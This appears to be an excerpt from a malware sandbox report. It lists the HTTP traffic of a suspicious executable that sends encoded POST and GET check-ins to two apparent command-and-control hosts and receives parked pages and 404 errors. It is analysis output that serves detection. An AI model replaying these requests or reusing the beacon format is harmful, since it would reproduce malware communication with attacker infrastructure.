                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 74 4a 35 77 54 74 63 61 39 34 30 50 45 46 62 77 36 4f 45 57 36 54 4b 30 67 64 35 53 53 6d 31 64 6e 76 33 75 39 64 47 42 38 5a 34 61 5a 6f 66 79 7a 79 77 69 46 46 30 58 74 46 56 4f 31 58 66 54 65 39 42 44 78 6e 6f 66 56 6c 53 47 55 34 65 43 4d 63 45 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:46:22.131647110 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmM1MTRmNzMtOWYwOS00YjkwLWI5NzktYmI2NWE3NTFlMTZiIiwicGFnZV90aW1lIjoxNzI1MzYwMz


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.449739199.59.243.226801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:46:24.248466015 CEST10810OUTPOST /12ts/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.myim.cloud
                      Origin: http://www.myim.cloud
                      Referer: http://www.myim.cloud/12ts/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 4a 41 4e 67 58 43 4f 45 55 44 2f 45 43 58 31 73 56 48 64 38 69 4d 49 48 7a 74 35 4e 52 74 51 6a 46 6b 77 46 42 5a 45 55 56 32 38 52 6c 6f 30 43 32 30 68 55 36 30 75 57 73 30 30 4a 68 37 59 6f 79 6c 67 65 79 46 6d 6a 50 4a 5a 6b 6d 71 6f 4a 48 71 65 4e 77 30 37 78 6f 44 78 32 35 51 78 70 49 2f 55 42 50 39 42 31 52 52 51 68 7a 44 56 30 36 31 6c 45 42 68 58 59 71 51 46 4f 67 2b 37 6b 66 62 74 58 4d 63 64 53 39 69 6b 71 57 75 56 34 55 64 59 71 56 79 47 70 78 73 71 49 69 4f 62 64 7a 4d 76 32 42 35 4c 72 6f 4d 47 73 6d 4b 42 38 45 44 45 4a 73 45 46 58 51 72 53 72 4c 4a 44 50 37 30 67 4c 43 77 78 37 4a 54 4b 73 4d 35 64 54 58 2b 4f 51 6f 34 67 65 79 34 62 45 41 2f 39 54 55 48 7a 38 70 39 32 72 76 77 75 78 49 67 57 61 7a 75 37 31 4e 63 5a 53 70 4b 6b 31 50 38 35 61 63 5a 77 59 74 36 65 79 2b 77 5a 42 5a 57 76 36 4a 32 36 57 2b 53 52 64 6e 78 41 4b 59 65 78 58 2f 75 6b 6c 4b 41 79 69 62 74 71 63 32 6d 54 74 2f 4f 6c 53 6c 41 6b 67 43 64 31 77 52 44 6b 30 34 [TRUNCATED]
                      Data Ascii: TJY8=SIczoioFeEyVJANgXCOEUD/ECX1sVHd8iMIHzt5NRtQjFkwFBZEUV28Rlo0C20hU60uWs00Jh7YoylgeyFmjPJZkmqoJHqeNw07xoDx25QxpI/UBP9B1RRQhzDV061lEBhXYqQFOg+7kfbtXMcdS9ikqWuV4UdYqVyGpxsqIiObdzMv2B5LroMGsmKB8EDEJsEFXQrSrLJDP70gLCwx7JTKsM5dTX+OQo4gey4bEA/9TUHz8p92rvwuxIgWazu71NcZSpKk1P85acZwYt6ey+wZBZWv6J26W+SRdnxAKYexX/uklKAyibtqc2mTt/OlSlAkgCd1wRDk04okNSRrbxBazTIVY3Ef82I4RNqqY8P+mRFPlLl1NCOGDI/uN6z50pynmoQGirzjNhLPZAjO4tdJTmkr23CBahw9R5uM7uaihDviNA/X5EkMzq1/nrOw8bmwGPMjFv+sSV2W8tBetGxfE7EdtZidS3gOwiZqmjbsBRzTkMUQfDefRp7YKsDE9wszVvr2AlFZeG5O/0k0mbzoBwG9W5YNAajcAzy9gBogy3/dPo3FIhxnT0d2e4e9sRSPseu2Q5XIdsHoVR+3dV66KbCSaAbz+elGDcgVvv2emQtCHQctRr7mwa8VJb4JIWQlxa9z/assmCBojqXqGQBMycHWohHYQqrZHnRW7sO8Zrt1xCgfMeQcKzWahQlCTiNSNHA3L9lNDJgJm0qV2fN7Vg8mHnk/ujcQPJZrmCJ+tOf7AH0UZieeoKTbH6CQvAP/cQOs4jZA33MPza6BiJIGdCWDS4AqgRw9E385V1oQRzQTpYqjFrBstjRr8OLk8o5eWrn4Q5JESz8ugEU5gu1m9/7KTrx3ttlwwn9uchd6IP/eG1F8NsTiVhCBIYBNorp3dGNQtOH/XOZk8VScHn6WxbUXDcAjI0dQUVpRylq1DpV9uctDvoBkcbQaNeIU5Jkrcjms5iQNK4H+cJjf46p+rg2EWTyXGi60RF+Kg9qGAg4j [TRUNCATED]
                      Sep 3, 2024 12:46:24.686636925 CEST1236INHTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:46:24 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1106
                      x-request-id: d4a6851d-008f-447f-9d9d-4510e60fa3e7
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                      set-cookie: parking_session=d4a6851d-008f-447f-9d9d-4510e60fa3e7; expires=Tue, 03 Sep 2024 11:01:24 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 74 4a 35 77 54 74 63 61 39 34 30 50 45 46 62 77 36 4f 45 57 36 54 4b 30 67 64 35 53 53 6d 31 64 6e 76 33 75 39 64 47 42 38 5a 34 61 5a 6f 66 79 7a 79 77 69 46 46 30 58 74 46 56 4f 31 58 66 54 65 39 42 44 78 6e 6f 66 56 6c 53 47 55 34 65 43 4d 63 45 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:46:24.686778069 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDRhNjg1MWQtMDA4Zi00NDdmLTlkOWQtNDUxMGU2MGZhM2U3IiwicGFnZV90aW1lIjoxNzI1MzYwMz


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.449741199.59.243.226801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:46:26.794883966 CEST450OUTGET /12ts/?TJY8=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&3L7=cfJLLBshpRPDzp HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.myim.cloud
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:46:27.237807989 CEST1236INHTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:46:26 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1454
                      x-request-id: 012fd1b3-3d4f-4b48-abf5-3dbaec4ffeaf
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uR26cbsThznJl597Dr/g6qoHjyRHPpyJCNKr/LpZ28+Ik3diLmLHlO5ERUrDZu/BuVc+NKfrt8Z96XQ9xNEHUQ==
                      set-cookie: parking_session=012fd1b3-3d4f-4b48-abf5-3dbaec4ffeaf; expires=Tue, 03 Sep 2024 11:01:27 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 52 32 36 63 62 73 54 68 7a 6e 4a 6c 35 39 37 44 72 2f 67 36 71 6f 48 6a 79 52 48 50 70 79 4a 43 4e 4b 72 2f 4c 70 5a 32 38 2b 49 6b 33 64 69 4c 6d 4c 48 6c 4f 35 45 52 55 72 44 5a 75 2f 42 75 56 63 2b 4e 4b 66 72 74 38 5a 39 36 58 51 39 78 4e 45 48 55 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uR26cbsThznJl597Dr/g6qoHjyRHPpyJCNKr/LpZ28+Ik3diLmLHlO5ERUrDZu/BuVc+NKfrt8Z96XQ9xNEHUQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:46:27.237822056 CEST907INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDEyZmQxYjMtM2Q0Zi00YjQ4LWFiZjUtM2RiYWVjNGZmZWFmIiwicGFnZV90aW1lIjoxNzI1MzYwMz


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.449742154.23.184.240801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:46:32.717315912 CEST705OUTPOST /ftud/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.d55dg.top
                      Origin: http://www.d55dg.top
                      Referer: http://www.d55dg.top/ftud/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 50 53 4f 6f 77 41 72 67 66 38 79 6f 72 52 6b 74 5a 30 55 30 6c 71 76 69 62 35 46 6a 72 74 44 63 39 4a 45 4d 38 76 54 63 67 62 39 34 7a 76 52 5a 71 6e 42 4a 37 76 38 77 67 78 2f 42 6c 4b 63 32 54 70 76 71 56 36 52 31 34 47 35 55 4f 71 44 79 33 70 72 53 59 6a 54 66 54 4f 33 6d 5a 4e 51 6b 38 77 63 45 58 71 75 4b 37 73 34 52 5a 52 30 44 7a 41 45 55 52 75 41 76 45 52 59 66 44 5a 30 66 30 62 34 34 4a 6f 58 72 4b 30 6d 73 31 6d 46 75 69 38 6a 48 31 46 57 4b 48 5a 45 6b 54 6f 6b 72 59 64 66 62 43 67 50 61 2f 6e 56 6c 67 56 44 75 53 2b 57 7a 32 69 6a 78 71 70 2b 4f 31 44 33 4c 65 67 3d 3d
                      Data Ascii: TJY8=PSOowArgf8yorRktZ0U0lqvib5FjrtDc9JEM8vTcgb94zvRZqnBJ7v8wgx/BlKc2TpvqV6R14G5UOqDy3prSYjTfTO3mZNQk8wcEXquK7s4RZR0DzAEURuAvERYfDZ0f0b44JoXrK0ms1mFui8jH1FWKHZEkTokrYdfbCgPa/nVlgVDuS+Wz2ijxqp+O1D3Leg==
                      Sep 3, 2024 12:46:33.583709955 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:46:33 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "668fe68e-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.449743154.23.184.240801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:46:35.258577108 CEST725OUTPOST /ftud/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.d55dg.top
                      Origin: http://www.d55dg.top
                      Referer: http://www.d55dg.top/ftud/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 50 53 4f 6f 77 41 72 67 66 38 79 6f 70 78 34 74 55 7a 6f 30 67 4b 76 74 55 5a 46 6a 78 64 44 59 39 4f 4d 4d 38 74 2b 52 67 75 74 34 79 4f 68 5a 72 6a 74 4a 34 76 38 77 76 52 2f 45 68 4b 63 70 54 70 7a 69 56 2f 70 31 34 43 70 55 4f 72 7a 79 69 4f 48 56 65 6a 54 42 4b 2b 33 6b 61 39 51 6b 38 77 63 45 58 75 2b 67 37 73 67 52 5a 42 45 44 78 6b 59 58 63 4f 41 75 44 52 59 66 56 70 30 62 30 62 34 4b 4a 70 4b 4f 4b 32 75 73 31 6a 68 75 7a 49 33 47 2f 46 57 49 4a 35 46 37 66 34 52 41 59 73 69 46 49 41 65 38 34 58 5a 2f 6c 54 53 30 44 50 33 6b 6b 69 48 43 33 75 33 36 34 41 4b 43 46 73 4b 41 6e 49 69 6c 36 67 63 53 32 51 74 5a 73 49 66 2b 6f 43 67 3d
                      Data Ascii: TJY8=PSOowArgf8yopx4tUzo0gKvtUZFjxdDY9OMM8t+Rgut4yOhZrjtJ4v8wvR/EhKcpTpziV/p14CpUOrzyiOHVejTBK+3ka9Qk8wcEXu+g7sgRZBEDxkYXcOAuDRYfVp0b0b4KJpKOK2us1jhuzI3G/FWIJ5F7f4RAYsiFIAe84XZ/lTS0DP3kkiHC3u364AKCFsKAnIil6gcS2QtZsIf+oCg=
                      Sep 3, 2024 12:46:36.128294945 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:46:35 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "668fe68e-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.449744154.23.184.240801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:46:37.806225061 CEST10807OUTPOST /ftud/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.d55dg.top
                      Origin: http://www.d55dg.top
                      Referer: http://www.d55dg.top/ftud/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 50 53 4f 6f 77 41 72 67 66 38 79 6f 70 78 34 74 55 7a 6f 30 67 4b 76 74 55 5a 46 6a 78 64 44 59 39 4f 4d 4d 38 74 2b 52 67 75 6c 34 79 34 31 5a 71 45 35 4a 35 76 38 77 69 78 2f 46 68 4b 63 6b 54 70 72 59 56 2f 74 44 34 45 31 55 42 70 37 79 6d 50 48 56 4c 54 54 42 58 4f 33 6c 5a 4e 51 31 38 77 4d 41 58 71 61 67 37 73 67 52 5a 43 63 44 69 51 45 58 65 4f 41 76 45 52 59 70 44 5a 31 38 30 62 77 61 4a 70 4f 77 4a 46 32 73 37 6a 78 75 78 62 66 47 39 6c 57 4f 45 5a 46 7a 66 34 4e 66 59 74 4f 42 49 44 44 5a 34 56 46 2f 70 30 76 56 57 2b 37 49 2f 79 4f 52 67 63 44 4a 33 48 69 6a 4e 37 57 59 73 4a 36 58 34 44 30 6a 36 79 51 48 78 4b 6a 76 71 6c 35 62 7a 70 4b 73 2b 34 52 50 54 5a 41 62 75 70 57 69 32 37 54 49 4b 42 31 36 30 75 43 6b 57 6b 75 32 38 50 38 72 45 43 36 34 55 64 51 65 45 57 4a 74 79 58 67 44 55 70 63 2f 46 47 34 6e 69 6e 54 52 71 6e 46 77 7a 48 47 72 47 4a 54 72 6b 51 42 78 33 6b 6a 43 43 73 68 37 59 37 4f 7a 4b 46 4c 72 4a 4e 41 6b 72 32 6d 69 52 46 79 30 36 38 63 35 50 44 54 2f 2b [TRUNCATED]
                      Data Ascii: TJY8=PSOowArgf8yopx4tUzo0gKvtUZFjxdDY9OMM8t+Rgul4y41ZqE5J5v8wix/FhKckTprYV/tD4E1UBp7ymPHVLTTBXO3lZNQ18wMAXqag7sgRZCcDiQEXeOAvERYpDZ180bwaJpOwJF2s7jxuxbfG9lWOEZFzf4NfYtOBIDDZ4VF/p0vVW+7I/yORgcDJ3HijN7WYsJ6X4D0j6yQHxKjvql5bzpKs+4RPTZAbupWi27TIKB160uCkWku28P8rEC64UdQeEWJtyXgDUpc/FG4ninTRqnFwzHGrGJTrkQBx3kjCCsh7Y7OzKFLrJNAkr2miRFy068c5PDT/+fOuaxw9en4rF28tjXjkbxV5q3n90RvSl2CEOHREzhernEMwLH4iIfQ5NqS7Ae6lkerKCyPsbUBlHwe9MEhQjpAHyW9CRjYahYJLS+jUgyWLaWEU9I0JW3zi78g5FCap2TsOFI3nSs/eOuU2sVP6bQN9iSW4F0JbSIUSovI1qoExBmr8ijfaVjeYBEU5kRKDVwNHowZ/9fwG3d497IikIJdY8TX1Un/fN4C1m3/EGM9zNZLL9C6ly3o375FXYMeuNIQhJxQtk/eqh++0tPOoqvIvJKWRvx8XT1c3sEKB8hbBqMVsKZaOHpb9MVBbbsQ/xtjlj/pQmz/aNICfXGIE0poDXXVHZbXFYVVebqX2krEC+Azm20btG+kC8DwpnToUx2ENNBSyZJqkBjQA7kYrRWXDNm0XX24tf4MX5wFvNCooFXucwnquv1PTSUJhEVdeIuG4XGPXPpOTMQsa2bDJBxI9U2ILJhdNo9DXPcVYcfbdMOz0XSkrafwxWBPX9kNwRL84wr5II1N5/eknms9S/xC5KpWhlZHGDHtuSWpcmC7zYGglLPjgakNstzO4Uf3cAtfj8+lz0uw2syKK/WkCqrJKaqkDYiaRLRycTlSaAcl4J67YQH2gWtwpntMg7NDjh2AUExD70I/GkwiXYZ76iZqWhX9fp/6AGP1 [TRUNCATED]
                      Sep 3, 2024 12:46:38.881063938 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 03 Sep 2024 10:46:38 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "668fe68e-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.449745154.23.184.240801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:46:40.347528934 CEST449OUTGET /ftud/?3L7=cfJLLBshpRPDzp&TJY8=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU= HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
